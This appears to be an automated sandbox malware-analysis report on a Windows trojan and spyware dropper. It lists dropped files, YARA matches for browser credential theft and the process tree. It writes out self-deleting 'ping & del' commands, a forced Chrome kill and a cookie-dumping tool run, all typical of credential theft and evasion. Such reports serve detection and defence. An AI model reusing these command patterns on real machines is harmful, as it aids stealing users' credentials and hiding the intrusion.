Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B9B7F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002BA7BB
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 344B323928698D9982C7577E5405A1CB587C45F94A0F6745827648381397F255
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 0044280F appears 302 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 004025E0 appears 342 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 0040C6E1 appears 99 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 00411D8B appears 39 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 00442842 appears 295 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 00442878 appears 83 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 00441423 appears 42 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 004115CB appears 41 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 00401070 appears 36 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 00441570 appears 54 times
Source: fnhcdXEfus.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 63C4F3D9EA0CC861.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1612045890161.exe.3.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1612045890161.exe.3.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fnhcdXEfus.exe, 00000000.00000002.246163908.00000000024AA000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInstallShield Setup.exe^ vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe, 00000000.00000002.246034972.0000000000BA0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe, 00000000.00000002.246020495.0000000000B80000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dllj% vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe, 00000000.00000002.246024794.0000000000B90000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe | Binary or memory string: OriginalFilenameInstallShield Setup.exe^ vs fnhcdXEfus.exe
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: fnhcdXEfus.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000004.00000002.274583056.00000000026D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000003.00000002.365832214.00000000026F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.246525217.0000000002810000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.fnhcdXEfus.exe.2810000.5.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.63C4F3D9EA0CC861.exe.26f0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.26d0000.5.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.10000000.7.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.63C4F3D9EA0CC861.exe.10000000.7.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.26d0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.63C4F3D9EA0CC861.exe.26f0000.2.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.fnhcdXEfus.exe.10000000.6.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.fnhcdXEfus.exe.2810000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.3280000.6.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 3.2.63C4F3D9EA0CC861.exe.3380000.5.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engine | Classification label: mal90.bank.troj.spyw.evad.winEXE@32/37@4/2
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0045895B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0043FFF7 lstrcpyW,GetDiskFreeSpaceExW
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Code function: 11_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00431AAB CoCreateInstance
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00418579 FindResourceW,SizeofResource,LoadResource,LockResource
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Login Data1612045889505
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | File created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: runfromtemp | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: eprq | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: debuglog | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Setup.cpp | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: reboot | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Setup.cpp | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Setup.cpp | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: %s%s | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: tempdisk1folder | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: ISSetup.dll | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: ISSetup.dll | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Skin | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Startup | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: setup.isn | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Supported | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Languages | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: %s\%s.ini | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: %s\%s.ini | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: %s\%.04ld.mst | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: %s\%.04ld.mst | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: StartUp | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Setup.cpp | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: clone_wait | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG | 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Setup.cpp | 0_2_0043ACD1
Source: fnhcdXEfus.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1612045890161.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: fnhcdXEfus.exe | Virustotal: Detection: 73%
Source: fnhcdXEfus.exe | Metadefender: Detection: 29%
Source: fnhcdXEfus.exe | ReversingLabs: Detection: 82%
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | File read: C:\Users\user\Desktop\fnhcdXEfus.exe
Source: unknown | Process created: C:\Users\user\Desktop\fnhcdXEfus.exe 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 72A2D95648135F8DB654A3D18B753FD0 C
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Users\user\AppData\Roaming\1612045890161.exe 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Process created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Process created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Process created: C:\Users\user\AppData\Roaming\1612045890161.exe 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt'
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe | Automated click: Install
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: fnhcdXEfus.exe | Static file information: File size 4453376 > 1048576
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: fnhcdXEfus.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: fnhcdXEfus.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: fnhcdXEfus.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: fnhcdXEfus.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: fnhcdXEfus.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: fnhcdXEfus.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: fnhcdXEfus.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: fnhcdXEfus.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.3.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1612045890161.exe, 0000000B.00000000.258604279.000000000040F000.00000002.00020000.sdmp, 1612045890161.exe.3.dr
Source: Binary string: atl71.pdbT source: atl71.dll.3.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.3.dr
Source: Binary string: atl71.pdb source: atl71.dll.3.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.3.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.3.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.3.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.3.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.3.dr
Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\setup.pdb source: fnhcdXEfus.exe
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001E.00000002.347950817.00000000002BC000.00000002.00020000.sdmp, ThunderFW.exe.3.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.3.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.3.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI6DDB.tmp.1.dr
Source: fnhcdXEfus.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: fnhcdXEfus.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: fnhcdXEfus.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: fnhcdXEfus.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: fnhcdXEfus.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Unpacked PE file: 0.2.fnhcdXEfus.exe.2810000.5.unpack
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00440314 __EH_prolog3_GS,LoadLibraryW,GetProcAddress,#17 | 0_2_00440314
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_004427DD push ecx; ret | 0_2_004427F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10010579 push ecx; ret | 0_2_1001058C
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10010579 push ecx; ret | 3_2_1001058C
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Code function: 11_2_0040E2F1 push ecx; ret | 11_2_0040E301
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Code function: 11_2_0040E340 push eax; ret | 11_2_0040E354
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Code function: 11_2_0040E340 push eax; ret | 11_2_0040E37C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B3FB5 push ecx; ret | 30_2_002B3FC8

Persistence and Installation Behavior:

Contains functionality to infect the boot sector
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: _memset,wsprintfW,CreateFileW,DeviceIoControl,_memset,CloseHandle,CloseHandle, \\.\PhysicalDrive%d | 0_2_1001D7E0
